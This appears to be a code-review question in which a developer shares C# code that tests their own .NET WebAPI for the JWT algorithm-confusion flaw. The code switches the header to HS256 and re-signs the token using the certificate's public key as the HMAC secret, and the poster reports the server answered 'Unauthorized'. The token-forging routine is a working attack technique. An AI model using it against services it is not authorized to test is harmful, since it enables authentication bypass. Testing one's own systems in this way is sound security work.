# JSON Web Token Vulnerability test in C# review

Tags: c#, security, jwt

I've attempted to check if the JWT Token Bearer support in WebAPI for .NET Framework 4.5 had the vulnerability as reported by https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/. 
So I wrote the following code that takes an existing, valid JWT token, manipulates the header, regenerates the signature using the certificate public key and resend it to the server.

```cs
    private static string TestSecurityVulnerability(string originalToken)
    {
        var parts = originalToken.Split(new[] { '.' }, StringSplitOptions.RemoveEmptyEntries);
        var headerPart = Encoding.UTF8.GetString(Convert.FromBase64String(parts.First()));
        var payloadPart = Encoding.UTF8.GetString(Convert.FromBase64String(parts.Skip(1).First()));

        dynamic headerJson = JsonConvert.DeserializeObject(headerPart);

        headerJson["alg"] = "HS256";
        headerJson["kid"] = 0;
        var tamperedHeaderEncoded = Base64UrlEncode(Encoding.UTF8.GetBytes(JsonConvert.SerializeObject(headerJson)));

        var cert = Certificate.Load();
        var publicKey = cert.PublicKey.EncodedKeyValue.RawData;
        var base64PublicKey = Convert.ToBase64String(publicKey); //Not using it but great for verifying if token is "valid"


        var sha = new HMACSHA256(publicKey);
        var newSigBinary = sha.ComputeHash(Encoding.UTF8.GetBytes(tamperedHeaderEncoded + "." + parts.Skip(1).First()));
        var newSigEncoded = Base64UrlEncode(newSigBinary);

        return string.Join(".", tamperedHeaderEncoded,
            parts.Skip(1).First(),
            newSigEncoded);
    }

    // from JWT spec
    private static string Base64UrlEncode(byte[] input)
    {
        var output = Convert.ToBase64String(input);
        output = output.Split('=')[0]; // Remove any trailing '='s
        output = output.Replace('+', '-'); // 62nd char of encoding
        output = output.Replace('/', '_'); // 63rd char of encoding
        return output;
    }
```

As for `Certificate.Load()`, all it does is look up the certificate that I'm using on IdentityServer to sign the token and it returns with a `System.Security.Cryptography.X509Certificates.X509Certificate2` certificate (PFX with public and private key).

I also inspected the value of `base64PublicKey` to see what the base64'd version is of the public key, to use that as the `256-bit-secret` on jwt.io.

My question is, did I do everything correctly? I've checked my solution on https://jwt.io/ and it seems legit from the point of view that I'm signing the JWT correctly but I don't know if I am extracting the certificate correctly.
Would be great just to have a pair of eyes go through this and let me know.

P.S. with my current test the server came back saying "Unauthorized" ;-)